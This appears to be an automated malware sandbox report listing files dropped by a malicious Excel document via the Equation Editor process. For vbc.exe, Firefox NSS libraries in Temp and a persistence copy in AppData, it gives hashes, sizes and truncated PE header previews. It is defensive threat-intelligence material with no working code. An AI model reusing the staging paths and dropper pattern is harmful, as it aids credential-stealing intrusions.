                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...l.h............!......................... ...............................0.......U....@.............................x............ ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................l.h.........:...d...d.......l.h.........d...............l.h.....................RSDSZ\.qM..I....3.....api-ms-win-crt-process-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......x....edata... ..`....rsrc$01....` .......rsrc$02....................l.h.............$...$...8.......X...................&...@...Y...q...........................*...E..._...z.......................!...<...V...q...........................9...V...t.......................7...R...i...

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-runtime-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22840
                                                                                                  Entropy (8bit):6.942029615075195
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7
                                                                                                  MD5:41A348F9BEDC8681FB30FA78E45EDB24
                                                                                                  SHA1:66E76C0574A549F293323DD6F863A8A5B54F3F9B
                                                                                                  SHA-256:C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
                                                                                                  SHA-512:8C2CB53CCF9719DE87EE65ED2E1947E266EC7E8343246DEF6429C6DF0DC514079F5171ACD1AA637276256C607F1063144494B992D4635B01E09DDEA6F5EEF204
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....L............!.........................0...............................@.......i....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v.....................L.........:...d...d.........L.........d.................L.....................RSDS6..>[d.=. ....C....api-ms-win-crt-runtime-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02......................L.....f.......k...k...8...............................4...S...s.......................E...g.......................)...N...n...................&...E...f...................'...D...j.......................>.......

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-stdio-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24368
                                                                                                  Entropy (8bit):6.873960147000383
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr
                                                                                                  MD5:FEFB98394CB9EF4368DA798DEAB00E21
                                                                                                  SHA1:316D86926B558C9F3F6133739C1A8477B9E60740
                                                                                                  SHA-256:B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
                                                                                                  SHA-512:57476FE9B546E4CAFB1EF4FD1CBD757385BA2D445D1785987AFB46298ACBE4B05266A0C4325868BC4245C2F41E7E2553585BFB5C70910E687F57DAC6A8E911E8
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................0...............................@.......)....@.............................a............0..............."..0=..............T............................................................................text...a........................... ..`.rsrc........0......................@..@v...............................8...d...d...................d.......................................RSDS...iS#.hg.....j....api-ms-win-crt-stdio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg.......a....edata...0..`....rsrc$01....`0.......rsrc$02................^...............(....... ...................<...y...........)...h........... ...]...............H...............)...D...^...v...............................T...u.......................9...Z...{...................0...Q...

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-string-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):23488
                                                                                                  Entropy (8bit):6.840671293766487
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj
                                                                                                  MD5:404604CD100A1E60DFDAF6ECF5BA14C0
                                                                                                  SHA1:58469835AB4B916927B3CABF54AEE4F380FF6748
                                                                                                  SHA-256:73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
                                                                                                  SHA-512:DA024CCB50D4A2A5355B7712BA896DF850CEE57AA4ADA33AAD0BAE6960BCD1E5E3CEE9488371AB6E19A2073508FBB3F0B257382713A31BC0947A4BF1F7A20BE4
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......S...........!.........................0...............................@......B.....@..........................................0..............."...9..............T............................................................................text............................... ..`.rsrc........0......................@..@v......................S........9...d...d..........S........d..................S....................RSDSI.......$[~f..5....api-ms-win-crt-string-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................S....,...............8...........W...s.......................#...B...a...........................<...[...z.......................;...[...{................... ...A...b...........................<...X...r.......

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-time-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):20792
                                                                                                  Entropy (8bit):7.018061005886957
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0
                                                                                                  MD5:849F2C3EBF1FCBA33D16153692D5810F
                                                                                                  SHA1:1F8EDA52D31512EBFDD546BE60990B95C8E28BFB
                                                                                                  SHA-256:69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
                                                                                                  SHA-512:44DC4200A653363C9A1CB2BDD3DA5F371F7D1FB644D1CE2FF5FE57D939B35130AC8AE27A3F07B82B3428233F07F974628027B0E6B6F70F7B2A8D259BE95222F5
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....OI...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v....................OI........7...d...d........OI........d................OI....................RSDS...s..,E.w.9I..D....api-ms-win-crt-time-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.........OI............H...H...(...H...h... ...=...\...z.......................8...V...s.......................&...D...a...~.......................?...b.......................!...F...k.......................0...N...k...................

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-utility-l1-1-0.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):18744
                                                                                                  Entropy (8bit):7.127951145819804
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q
                                                                                                  MD5:B52A0CA52C9C207874639B62B6082242
                                                                                                  SHA1:6FB845D6A82102FF74BD35F42A2844D8C450413B
                                                                                                  SHA-256:A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
                                                                                                  SHA-512:18834D89376D703BD461EDF7738EB723AD8D54CB92ACC9B6F10CBB55D63DB22C2A0F2F3067FE2CC6FEB775DB397030606608FF791A46BF048016A1333028D0A4
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....!5............!......................... ...............................0.......4....@.............................^............ ..................8=..............T............................................................................text...n........................... ..`.rsrc........ ......................@..@v....................!5.........:...d...d........!5.........d................!5.....................RSDS............k.....api-ms-win-crt-utility-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......^....edata... ..`....rsrc$01....` .......rsrc$02.....................!5.....d...............8.......(...................#...<...U...l...............................+...@...[...r...................................4...I..._.......................3...N...e...|.......................

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\freebl3.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):332752
                                                                                                  Entropy (8bit):6.8061257098244905
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:C+YBCxpjbRIDmvby5xDXlFVJM8PojGGHrIr1qqDL6XP+jW:Cu4Abg7XV72GI/qn6z
                                                                                                  MD5:343AA83574577727AABE537DCCFDEAFC
                                                                                                  SHA1:9CE3B9A182429C0DBA9821E2E72D3AB46F5D0A06
                                                                                                  SHA-256:393AE7F06FE6CD19EA6D57A93DD0ACD839EE39BA386CF1CA774C4C59A3BFEBD8
                                                                                                  SHA-512:827425D98BA491CD30929BEE6D658FCF537776CE96288180FE670FA6320C64177A7214FF4884AE3AA68E135070F28CA228AFB7F4012B724014BA7D106B5F0DCE
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L......Z.........."!.........f...............................................p......o.....@.............................P...`........@..p....................P..........T...........................8...@...............8............................text...U........................... ..`.rdata..............................@..@.data...lH..........................@....rsrc...p....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\mozglue.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):139216
                                                                                                  Entropy (8bit):6.841477908153926
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:8Oqe98Ea4usvd5jm6V0InXx/CHzGYC6NccMmxK3atIYHD2JJJsPyimY4kQkE:Vqe98Evua5Sm0ux/5YC6NccMmtXHD2JR
                                                                                                  MD5:9E682F1EB98A9D41468FC3E50F907635
                                                                                                  SHA1:85E0CECA36F657DDF6547AA0744F0855A27527EE
                                                                                                  SHA-256:830533BB569594EC2F7C07896B90225006B90A9AF108F49D6FB6BEBD02428B2D
                                                                                                  SHA-512:230230722D61AC1089FABF3F2DECFA04F9296498F8E2A2A49B1527797DCA67B5A11AB8656F04087ACADF873FA8976400D57C77C404EBA4AFF89D92B9986F32ED
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."yQ.f.?Mf.?Mf.?Mo`.Mv.?M.z>Lb.?M...Md.?M.z<Lh.?M.z;Lm.?M.z:Lu.?MDx>Lo.?Mf.>M..?M.{1Lu.?M.{?Lg.?M.{.Mg.?M.{=Lg.?MRichf.?M................PE..L......Z.........."!.........................................................@............@.............................\...L...,.... ..p....................0......p...T...............................@...................T...@....................text............................... ..`.rdata...b.......d..................@..@.data...............................@....rsrc...p.... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\msvcp140.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):440120
                                                                                                  Entropy (8bit):6.652844702578311
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
                                                                                                  MD5:109F0F02FD37C84BFC7508D4227D7ED5
                                                                                                  SHA1:EF7420141BB15AC334D3964082361A460BFDB975
                                                                                                  SHA-256:334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
                                                                                                  SHA-512:46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\nss3.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1244112
                                                                                                  Entropy (8bit):6.809431682312062
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24576:XDI7I4/FeoJQuQ3IhXtHfjyqgJ0BnPQAib7/12bg2JSna5xfg0867U4MSpu731hn:uQ3YX5jyqgynPkbd24VwMSpu7Fhn
                                                                                                  MD5:556EA09421A0F74D31C4C0A89A70DC23
                                                                                                  SHA1:F739BA9B548EE64B13EB434A3130406D23F836E3
                                                                                                  SHA-256:F0E6210D4A0D48C7908D8D1C270449C91EB4523E312A61256833BFEAF699ABFB
                                                                                                  SHA-512:2481FC80DFFA8922569552C3C3EBAEF8D0341B80427447A14B291EC39EA62AB9C05A75E85EEF5EA7F857488CAB1463C18586F9B076E2958C5A314E459045EDE2
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........x..c+..c+..c+...+..c++.b*..c+lh.+..c++.`*..c++.f*..c++.g*..c+.b*..c+9.b*..c+..b+..c+9.k*..c+9.g*C.c+9.c*..c+9..+..c+9.a*..c+Rich..c+................PE..L...a..Z.........."!................T........................................@............@.............................d....<..T.......h.......................t~..0...T...............................@............................................text............................... ..`.rdata...P.......R..................@..@.data....E...`... ...:..............@....rsrc...h............Z..............@..@.reloc..t~...........^..............@..B................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\nssdbm3.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):92624
                                                                                                  Entropy (8bit):6.639368309935547
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:5vNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41ZH:hNGVOiBZbcGmxXMcBqmzoCUZoZebHZMw
                                                                                                  MD5:569A7A65658A46F9412BDFA04F86E2B2
                                                                                                  SHA1:44CC0038E891AE73C43B61A71A46C97F98B1030D
                                                                                                  SHA-256:541A293C450E609810279F121A5E9DFA4E924D52E8B0C6C543512B5026EFE7EC
                                                                                                  SHA-512:C027B9D06C627026774195D3EAB72BD245EBBF5521CB769A4205E989B07CB4687993A47061FF6343E6EC1C059C3EC19664B52ED3A1100E6A78CFFB1C46472AFB
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z.Y.4.Y.4.Y.4.P...U.4...5.[.4..y.Q.4...7.X.4...1.S.4...0.R.4.{.5.[.4...5.Z.4.Y.5...4...0.A.4...4.X.4....X.4...6.X.4.RichY.4.........................PE..L......Z.........."!.........0...............0............................................@..........................?.......@.......`..p............L.......p.......:..T...........................(;..@............0..X............................text............................... ..`.rdata..4....0... ..................@..@.data........P.......>..............@....rsrc...p....`.......@..............@..@.reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\softokn3.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):144336
                                                                                                  Entropy (8bit):6.5527585854849395
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:zAf6suip+z7FEk/oJz69sFaXeu9CoT2nIZvetBWqIBoE9Mv:Q6PpsF4CoT2EeY2eMv
                                                                                                  MD5:67827DB2380B5848166A411BAE9F0632
                                                                                                  SHA1:F68F1096C5A3F7B90824AA0F7B9DA372228363FF
                                                                                                  SHA-256:9A7F11C212D61856DFC494DE111911B7A6D9D5E9795B0B70BBBC998896F068AE
                                                                                                  SHA-512:910E15FD39B48CD13427526FDB702135A7164E1748A7EACCD6716BCB64B978FE333AC26FA8EBA73ED33BD32F2330D5C343FCD3F0FE2FFD7DF54DB89052DB7148
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L......Z.........."!.........`...............................................P......+Z....@..........................................0..p....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...C.......D..................@..@.data........ ......................@....rsrc...p....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\ucrtbase.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1142072
                                                                                                  Entropy (8bit):6.809041027525523
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
                                                                                                  MD5:D6326267AE77655F312D2287903DB4D3
                                                                                                  SHA1:1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
                                                                                                  SHA-256:0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
                                                                                                  SHA-512:11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\98EFC334\vcruntime140.dll

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):83784
                                                                                                  Entropy (8bit):6.890347360270656
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
                                                                                                  MD5:7587BF9CB4147022CD5681B015183046
                                                                                                  SHA1:F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
                                                                                                  SHA-256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
                                                                                                  SHA-512:0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\~DF188C2E71568D664F.TMP

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:CDFV2 Encrypted
                                                                                                  Category:dropped
                                                                                                  Size (bytes):191160
                                                                                                  Entropy (8bit):7.957713301890005
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:ZHleO1edR2/U5dHP/9+8W7AkMQEf0aQ0pJ4J8Bav+EldNpn/IeqyIAVrkpWVkZ9/:wQMHAMjfX4J8RElPV/TzHVsAD4p
                                                                                                  MD5:A7442EB728E243C9E2A06EBE73FC68F7
                                                                                                  SHA1:26DBDEA0866C5BC625E0D7568E0D65CC8D032BE4
                                                                                                  SHA-256:1694FE96AF5B61266748982C92DF975D59BC5CFF275F2526FC866685B7447335
                                                                                                  SHA-512:A203BD3405983C8F3F64CE0DA65A3ABEE11C25B3533529F869CBDE26CF4863BFC3DFD6DC95686300AA58C4966073951D2872B36188951A2AE4ABEBB38DD0F2E6
                                                                                                  Malicious:false
                                                                                                  Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                  C:\Users\user\AppData\Local\Temp\~DFC92471CBA952CCA7.TMP

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):512
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3::
                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                  Malicious:false
                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\~DFCADDE1477ADF4DA0.TMP

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):512
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3::
                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                  Malicious:false
                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\~DFEF0007CE36AF2DE4.TMP

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):512
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3::
                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                  Malicious:false
                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe

                                                                                                  Download File
                                                                                                  Process:C:\Users\Public\vbc.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):196608
                                                                                                  Entropy (8bit):4.954046985613375
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:B/fgVgb2KTbpyRAclDWz98JfkT7M9Q5UyB:JgSbJbwScsqJMj
                                                                                                  MD5:8620EEAF925B0C5943C5B0A217797A32
                                                                                                  SHA1:A5D8E44B1FFC4AB251026C5381559884901593D0
                                                                                                  SHA-256:567BC9BBF28D175408E7CF8055066CD723F71E3A23BEEFE06038F3EB4795C1DA
                                                                                                  SHA-512:A919376BE6FEB5EA6653FA6B04EC1B6EFF9BFF5E9E0E2A7CD2D327730D330302091328F555263D6237CFC7AC4A5B098B12FE20476F929560236A9A9E6D1F960D
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...K_................0..8...........V... ...`....@.. .......................`............@..................................U..K....`.......................@....................................................... ............... ..H............text...46... ...8.................. ..`.rsrc........`.......:..............@..@.reloc.......@......................@..B.................V......H........0...$..........$U...............................................0..6........(.........(.....(....(....o.....(.....(.......8.....*..".(.....*..........(....r...p......%......(.....(...........%..P.o....&*.0...........s....%r...po.....%r...po.....%.o......8.....*..".(.....*....0..T......... ....(...........&.......r5..p(....o....o....s.... .^[.o.......(.....(.....o....&*................".(.....*....0............(....o.......8..........o........8t...........o....r}..p(.

                                                                                                  C:\Users\user\Desktop\~$Scanjet 23002022.xlsx

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):165
                                                                                                  Entropy (8bit):1.4377382811115937
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                                                  MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                                                  SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                                                  SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                                                  SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                                                  Malicious:true
                                                                                                  Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                  C:\Users\Public\vbc.exe

                                                                                                  Download File
                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):196608
                                                                                                  Entropy (8bit):4.954046985613375
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:B/fgVgb2KTbpyRAclDWz98JfkT7M9Q5UyB:JgSbJbwScsqJMj
                                                                                                  MD5:8620EEAF925B0C5943C5B0A217797A32
                                                                                                  SHA1:A5D8E44B1FFC4AB251026C5381559884901593D0
                                                                                                  SHA-256:567BC9BBF28D175408E7CF8055066CD723F71E3A23BEEFE06038F3EB4795C1DA
                                                                                                  SHA-512:A919376BE6FEB5EA6653FA6B04EC1B6EFF9BFF5E9E0E2A7CD2D327730D330302091328F555263D6237CFC7AC4A5B098B12FE20476F929560236A9A9E6D1F960D
                                                                                                  Malicious:true
